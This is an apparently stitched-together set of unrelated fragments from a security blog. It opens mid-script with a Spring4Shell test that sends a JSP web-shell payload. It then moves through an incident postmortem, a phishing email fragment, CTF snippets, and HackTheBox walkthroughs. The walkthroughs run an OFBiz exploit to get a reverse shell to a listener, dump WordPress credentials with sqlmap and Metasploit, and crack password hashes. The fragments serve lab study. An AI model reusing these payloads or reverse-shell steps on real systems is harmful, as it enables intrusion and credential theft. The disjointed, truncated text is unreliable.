for x inrange(5): payload = ( "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(" "%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di." "getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20" "%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%" "7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module." "classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader." "resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent." "pipeline.first.fileDateFormat=" ) print(f"[{x + 1}/5]: Making test request to {target} with payload: {payload}") conn = http.client.HTTPConnection(target)
print("[+] Test completed.") print(f"[+] Successful responses: {successful_responses}/5")
if __name__ == "__main__": main()
Troubleshooting: Addressing Port Conflicts
During the deployment of the firewall_server.py script, an error was encountered:
1
OSError: [Errno 48] Address already in use
This indicated that port 8000 was occupied by another process, preventing the firewall server from binding to it. The following steps were undertaken to resolve the issue:
Identifying the Occupying Process:
Using the lsof command:
1
lsof -i :8000
This command revealed the Process ID (PID) of the application using port 8000.
Terminating the Conflicting Process:
The identified process was terminated using the kill command:
1
kill -9 <PID>
Replace <PID> with the actual Process ID obtained from the previous step.
Verifying Port Availability:
Ensuring that port 8000 was free by rerunning the lsof command:
1
lsof -i :8000
No output indicates that the port is now free.
Restarting the Firewall Server:
After freeing up the port, the firewall_server.py script was successfully executed:
1
python3 firewall_server.py
The server started without issues, indicating that it was listening on the designated port.
Alternative Solution: Changing the Server Port
If port 8000 remains consistently in use, an alternative approach involves changing the server to listen on a different port (e.g., 8080). This requires updating both the firewall_server.py and test_requests.py scripts to reflect the new port number.
Edit firewall_server.py:
Modify the port variable:
1 2
host = "localhost" port = 8080
Edit test_requests.py:
Update the port number accordingly:
1 2
host = "localhost" port = 8080
Run the Modified Server:
1
python3 firewall_server.py
Run the Test Requester:
1
python3 test_requests.py
This ensures that the firewall rule is correctly applied on the new port.
Task 4: Incident Postmortem and Lessons Learned
Incident Postmortem: Spring4Shell Malware Attack on NBN Connection Service
Summary
On March 20th, 2024, at 14:20 UTC, Telstra’s Security Operations Centre (SOC) detected a P1 - Critical malware attack targeting the NBN Connection service (nbn.external.network), operating on Spring Framework 5.3.0. The attack involved multiple malicious POST requests to the /tomcatwar.jsp endpoint, exploiting the Spring4Shell (CVE-2022-22965) vulnerability. The incident was identified through firewall log analysis and was successfully mitigated two hours after detection by implementing a targeted firewall rule. Key teams involved in the response included the Security Operations Centre and the NBN Team.
Impact
Service Disruption: The NBN Connection service experienced significant downtime, impairing high-speed internet connectivity for customers relying on this infrastructure.
Operational Impairment: Critical services dependent on the NBN Connection, such as remote communications and business operations, were temporarily affected.
Potential Data Exposure: Although no data breaches were confirmed, the nature of the attack posed a risk of unauthorized command execution and potential data exfiltration.
Detection
The incident was discovered through routine monitoring of firewall logs by the SOC. Analysis revealed a pattern of multiple POST requests to the /tomcatwar.jsp endpoint originating from several IP addresses within the AU region. These requests contained specific malicious payloads characteristic of the Spring4Shell vulnerability, including parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others designed to execute remote commands.
Root Cause
The root cause of the incident was the exploitation of the Spring4Shell (CVE-2022-22965) vulnerability within the Spring Framework 5.3.0 used by the NBN Connection service. Attackers crafted malicious POST requests to the /tomcatwar.jsp endpoint, embedding payloads that leveraged this vulnerability to execute arbitrary commands on the server, leading to service disruption and impaired functionality.
Resolution
To mitigate the attack, the SOC collaborated with the Networks Team to implement a targeted firewall rule using a Python-based HTTP server (firewall_server.py). The rule specifically blocked incoming POST requests to the /tomcatwar.jsp endpoint that contained the identified malicious parameters. This measure effectively halted the ongoing attack within two hours of its initiation, restoring the NBN Connection service to operational status and preventing further unauthorized access.
Action Items
Immediate Actions:
Firewall Rule Implementation: Successfully deployed a Python-scripted firewall rule to block malicious POST requests targeting the /tomcatwar.jsp endpoint.
Service Restoration: Coordinated with the Networks Team to ensure the NBN Connection service was promptly restored to normal operations.
Short-Term Actions:
Vulnerability Patching: Upgrade the Spring Framework to the latest version to eliminate the exploited Spring4Shell vulnerability.
Enhanced Monitoring: Increase the frequency and depth of firewall log reviews to detect similar or new attack patterns more swiftly.
Incident Documentation: Complete detailed documentation of the incident for future reference and compliance purposes.
Long-Term Actions:
Security Training: Conduct training sessions for the SOC and relevant teams on identifying and responding to similar vulnerabilities and attack vectors.
Comprehensive Security Audit: Perform a thorough security audit of all critical services to identify and remediate potential vulnerabilities.
Automation of Response Mechanisms: Develop automated scripts and tools to detect and mitigate such attacks in real-time, reducing response times.
Collaboration with Development Teams: Work closely with development teams to ensure secure coding practices are followed, particularly when using frameworks like Spring.
Future Prevention:
Regular Updates and Patching: Establish a routine schedule for updating and patching all software frameworks and dependencies to minimize vulnerability exposure.
Advanced Threat Detection Systems: Invest in more sophisticated threat detection and prevention systems that can identify and block complex attack patterns.
Incident Response Drills: Conduct regular incident response drills to ensure all teams are prepared to handle similar attacks efficiently.
Lessons Learned
Proactive Monitoring: Continuous and proactive monitoring of firewall logs is essential in the early detection of potential threats.
Collaborative Response: Effective communication and collaboration between the SOC and infrastructure teams are critical in swiftly mitigating attacks.
Automation and Scripting: Utilizing scripting languages like Python for developing automated firewall rules can significantly enhance response times and accuracy.
Regular Patching: Keeping all software frameworks and dependencies up-to-date is vital in preventing exploitation of known vulnerabilities.
Comprehensive Documentation: Maintaining detailed incident postmortems aids in future governance, risk management, and compliance efforts while educating the team on handling similar incidents.
Conclusion
This incident underscored the importance of robust monitoring, swift response mechanisms, and collaborative efforts in combating sophisticated malware attacks. By implementing targeted firewall rules and adhering to best practices in incident response, Telstra effectively mitigated the Spring4Shell attack, ensuring the continuity of its critical services and reinforcing its commitment to cybersecurity excellence.
Prepared by: Telstra Security Operations Date: April 27, 2024
Hello dear user, I am Larry Page and I am delighted to announce to you that= you are the 99999999th GMAIL account and for that we want to reward you. = You've earned $1,000,000. To claim your prize open the attached file. ----_NmP-426c22a2e0d8fc9a-Part_2 Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: quoted-printable
<p>Hello dear user, I am Larry Page and I am delighted to announce to you = that you are the 99999999th GMAIL account and for that we want to reward = you. You've earned $1,000,000. To claim your prize open the attached file.= <br></p> ----_NmP-426c22a2e0d8fc9a-Part_2--
# 循环提取 ZIP 文件 while [ -f "$filename" ]; do # 提取当前 ZIP 文件中的所有内容 unzip -o "$filename" # 找到下一个 ZIP 文件 next_zip=$(find . -name "*.zip" | head -n 1) # 如果找到新的 ZIP 文件,更新 filename,否则跳出循环 if [ -n "$next_zip" ]; then filename="$next_zip" else echo "Extraction complete or no more ZIP files found." break fi done
~/Desktop/testtest/ hexdump -C message.txt 00000000 ff fe 68 00 fe ff 00 65 ff fe 32 00 fe ff 00 30 |..h....e..2....0| 00000010 ff fe 32 00 fe ff 00 33 ff fe 7b 00 fe ff 00 75 |..2....3..{....u| 00000020 ff fe 37 00 fe ff 01 92 ff fe 5f 00 fe ff 00 62 |..7......._....b| 00000030 ff fe 30 00 fe ff 00 6d ff fe 35 00 fe ff 00 73 |..0....m..5....s| 00000040 ff fe 5f 00 fe ff 00 38 ff fe 72 00 fe ff 15 f1 |.._....8..r.....| 00000050 ff fe 5f 00 fe ff 00 6e ff fe 30 00 fe ff 00 37 |.._....n..0....7| 00000060 ff fe 5f 00 fe ff 00 38 ff fe 63 31 fe ff 00 77 |.._....8..c1...w| 00000070 ff fe 61 00 fe ff 00 79 ff fe 35 00 fe ff 00 5f |..a....y..5...._| 00000080 ff fe 31 00 fe ff 00 67 ff fe 6e 00 fe ff 00 30 |..1....g..n....0| 00000090 ff fe 72 00 fe ff 15 f1 ff fe 64 00 fe ff 00 7d |..r.......d....}| 000000a0
提取出flag:
1
he2023{u7_b0m5s_8r_n07_8c1way5_1gn0rd}
Rotational
题目:
1
96a_abL_?b04c?0Cbc50C_E_C03c4<HcC5DN
任务是解密这段文本,(flag)。初步尝试使用常见的 ROT13 等简单的旋转密码未能成功,提示“the rotor must have been too fast!”暗示可能使用了更复杂的旋转算法。
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Invalidated] └─# nmap -sC -sV $(cat ip.txt) Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 23:26 AEST Nmap scan report for invalidated.htb (10.129.233.58) Host is up (0.015s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Sign up |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.09 seconds
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental] └─# nmap -sC -sV $(cat ip.txt) Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 19:58 AEST Nmap scan report for 10.129.96.12 Host is up (0.010s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Mixt Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental] └─# dirsearch -u "http://10.129.96.12" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict
www-data@rental:/var/www/html/admin$ mysql -u manager -p'password#1' car_rental_db Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 217 Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
MariaDB [car_rental_db]> SHOW GRANTS FOR 'manager'@'localhost'; +---------------------------------------------------------------------------------------------------------------+ | Grants for manager@localhost | +---------------------------------------------------------------------------------------------------------------+ | GRANT FILE ON *.* TO `manager`@`localhost` IDENTIFIED BY PASSWORD '*A778F55EAE542DA23ED0F6351B01262EFFD3BBB0' | | GRANT ALL PRIVILEGES ON `car_rental_db`.* TO `manager`@`localhost` | +---------------------------------------------------------------------------------------------------------------+ 2 rows inset (0.000 sec)
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbirtray file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST Nmap scan report for bizness.htb (10.129.232.1) Host is up (0.040s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 41845/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
1
echo"10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# update-alternatives --config java There are 3 choices for the alternative java (providing /usr/bin/java).
Press <enter> to keep the current choice[*], or type selection number: 1 update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# java --version openjdk 11.0.20-ea 2023-07-18 OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1) OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
开启tcpdump
1
sudo tcpdump -i 2 icmp
运行POC
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8" Not Sure Worked or not
查看抓到的数据包:
1 2 3 4 5 6 7 8
┌──(root@kali)-[/home/h4m5t/Desktop] └─# tcpdump -i 2 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes 21:47:38.693694 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64 21:47:38.693728 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64 21:47:39.695235 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64 21:47:39.695274 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64
说明RCE成功,现在进行反向shell
首先开启nc监听,再运行exp
1
nc -nlvp 4444
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444 Not Sure Worked or not
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash <ecurity/config$ cat security.properties | grep hash # -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() -- password.encrypt.hash.type=SHA
cat HashCrypt.java /******************************************************************************* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. *******************************************************************************/ package org.apache.ofbiz.base.crypto;
privatestaticbooleandoCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) { inttypeEnd= crypted.indexOf("}"); StringhashType= crypted.substring(1, typeEnd); Stringhashed= crypted.substring(typeEnd + 1); MessageDigestmessagedigest= getMessageDigest(hashType); messagedigest.update(bytes); byte[] digestBytes = messagedigest.digest(); char[] digestChars = Hex.encodeHex(digestBytes); StringcheckCrypted=newString(digestChars); if (hashed.equals(checkCrypted)) { returntrue; } // This next block should be removed when all {prefix}oldFunnyHex are fixed. if (hashed.equals(oldFunnyHex(digestBytes))) { Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted); returntrue; } returnfalse; }
/* * @deprecated use cryptBytes(hashType, salt, password); eventually, use * cryptUTF8(hashType, salt, password) after all existing installs are * salt-based. If the call-site of cryptPassword is just used to create a *new* * value, then you can switch to cryptUTF8 directly. */ @Deprecated publicstatic String cryptPassword(String hashType, String salt, String password) { if (hashType.startsWith("PBKDF2")) { return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null; } return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null; }
messagedigest.update(strBytes); return oldFunnyHex(messagedigest.digest()); } catch (Exception e) { Debug.logError(e, "Error while computing hash of type " + hashType, module); } return str; }
// This next block should be removed when all {prefix}oldFunnyHex are fixed. privatestatic String oldFunnyHex(byte[] bytes) { intk=0; char[] digestChars = newchar[bytes.length * 2]; for (byte b : bytes) { inti1= b;
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256
ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
graph LR A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?} C -->|Yes| D[Execute<br>JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to<br>attacker's server] F --> G[Download &<br>execute<br>malicious codes] G --> H[Attacker gains<br>server control]
Incident Timeline
timeline title Log4j Vulnerability Incident Timeline November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0) December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
缓解措施
Log4j漏洞,也称为**Log4Shell (CVE-2021-44228)**,是一个严重的远程代码执行(RCE)漏洞,影响了 Apache Log4j 2 版本。这一漏洞允许攻击者通过向日志记录输入恶意的JNDI(Java Naming and Directory Interface)查找字符串,触发服务器下载和执行恶意代码。
┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─# nmap -sV $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining) Nmap scan report for 10.129.231.241 Host is up (0.0093s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
[15:30:38] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.24, Nginx 1.18.0 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [15:30:38] [INFO] fetching database names available databases [2]: [*] blog [*] information_schema
[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv' [15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/wp_bookingpress_category_services_sqli 2022-02-28 normal Yes Wordpress BookingPress bookingpress_front_get_category_services SQLi
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli
msf6 > use 0 msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb RHOST => metapress.htb msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/ TARGETURI => /events/ msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run [*] Running module against 10.129.231.241
[*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Extracting credential information Wordpress User Credentials ==========================
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash Created directory: /root/.john Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status partylikearockstar (manager)
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# ftp metapress.htb@$IP Connected to 10.129.231.241. 220 ProFTPD Server (Debian) [::ffff:10.129.231.241] 331 Password required for metapress.htb Password: 230 User metapress.htb logged in Remote system type is UNIX. Using binary mode to transfer files. ftp>
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash 运行john时报错:
1
Crash recovery file is locked: /root/.john/john.rec
解决方法:
1
rm /root/.john/john.rec
开始爆破:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65011712 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status blink182 (Passpie) 1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november Use the "--show" option to display all of the cracked passwords reliably Session completed.
COMMANDS: webscan, ws Run a webscan task servicescan, ss Run a service scan task subdomain, sd Run a subdomain task poclint, pl, lint lint yaml poc burp-gamma, btg Convert the export file of burp historical proxy records to POC format transform transform other script to gamma reverse Run a standalone reverse server convert convert results from json to html or from html to json genca GenerateToFile CA certificate and key upgrade check new version and upgrade self if any updates found version Show version info x A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file. help, h Shows a list of commands or help for one command
GLOBAL OPTIONS: --config FILE Load configuration from FILE (default: "config.yaml") --log-level value Log level, choices are debug, info, warn, error, fatal --help, -h show help [INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml
OPTIONS: --list, -l list plugins --plugins value, --plugin value, --plug value specify the plugins to run, separated by ',' --poc value, -p value specify the poc to run, separated by ',' --level value specify the level of poc to run, separated by ',' --tags value specify the level of poc to run, separated by ','
--listen value use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111) --basic-crawler value, --basic value use a basic spider to crawl the target and scan the requests --browser-crawler value, --browser value use a browser spider to crawl the target and scan the requests --url-file value, --uf value read urls from a local file and scan these urls, one url per line --burp-file value, --bf value read requests from burpsuite exported file as targets --url value, -u value scan a **single** url --data value, -d value data string to be sent through POST (e.g. 'username=admin') --raw-request FILE, --rr FILE load http raw request from a FILE --force-ssl, --fs force usage of SSL/HTTPS for raw-request
--json-output FILE, --jo FILE output xray results to FILE in json format --html-output FILE, --ho FILE output xray result to FILE in HTML format --webhook-output value, --wo value post xray result to url in json format
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml
Enabled plugins: [phantasm]
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml [INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details) [INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/ [Vuln: phantasm] Target "http://example.com/" VulnType "poc-yaml-jumpserver-session-replay-unauth/default" Author "Chaitin" Links ["https://stack.chaitin.com/techblog/detail/156"]
[*] All pending requests have been scanned [*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00% [INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H -A Add a certificate to the database (create if needed) -E Add an Email certificate to the database (create if needed) -n cert-name Specify the nickname of the certificate to add -t trustargs Set the certificate trust attributes: p valid peer P trusted peer (implies p) c valid CA T trusted CA to issue client certs (implies c) C trusted CA to issue server certs (implies c) u user cert w send warning g make step-up cert -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -a The input certificate is encoded in ASCII (RFC1113) -i input Specify the certificate file (default is stdin)
-C Create a new binary certificate from a BINARY cert request -c issuer-name The nickname of the issuer cert -i cert-request The BINARY certificate request file -o output-cert Output binary cert to this file (default is stdout) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
-G Generate a new key pair -h token-name Name of token in which to generate key (default is internal) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -g key-size Key size in bits, (min 512, max 2048, default 1024) -y exp Set the public exponent value (3, 17, 65537) (rsa only) -f password-file Specify the password file -z noisefile Specify the noise file to be used -q pqgfile read PQG value from pqgfile (dsa only) -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-D Delete a certificate from the database -n cert-name The nickname of the cert to delete -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-U List all modules -d moddir Module database directory (default is '~/.netscape') -P dbprefix Cert & Key database prefix -X force the database to open R/W
-K List all keys -h token-name Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens) -k key-type Type of key pair to list ("all", "dsa", "rsa" (default)) -f password-file Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-L List all certs, or print out a single named cert -n cert-name Pretty print named cert (list all if unspecified) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W -r For single cert, print binary DER encoding -a For single cert, print ASCII encoding (RFC1113)
-M Modify trust attributes of certificate -n cert-name The nickname of the cert to modify -t trustargs Set the certificate trust attributes (see -A above) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-N Create a new certificate database -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-T Reset the Key database or token -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -h token-name Token to reset (default is internal)
-O Print the chain of a certificate -n cert-name The nickname of the cert to modify -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-R Generate a certificate request (stdout) -s subject Specify the subject name (using RFC1485) -o output-req Output the cert request to this file -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -f pwfile Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -a Output the cert request in ASCII (RFC1113); default is binary
-V Validate a certificate -n cert-name The nickname of the cert to Validate -b time validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]") -e Check certificate signature -u certusage Specify certificate usage: C SSL Client V SSL Server S Email signer R Email Recipient -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-S Make a certificate and add to database -n key-name Specify the nickname of the cert -s subject Specify the subject name (using RFC1485) -c issuer-name The nickname of the issuer cert -t trustargs Set the certificate trust attributes (see -A above) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
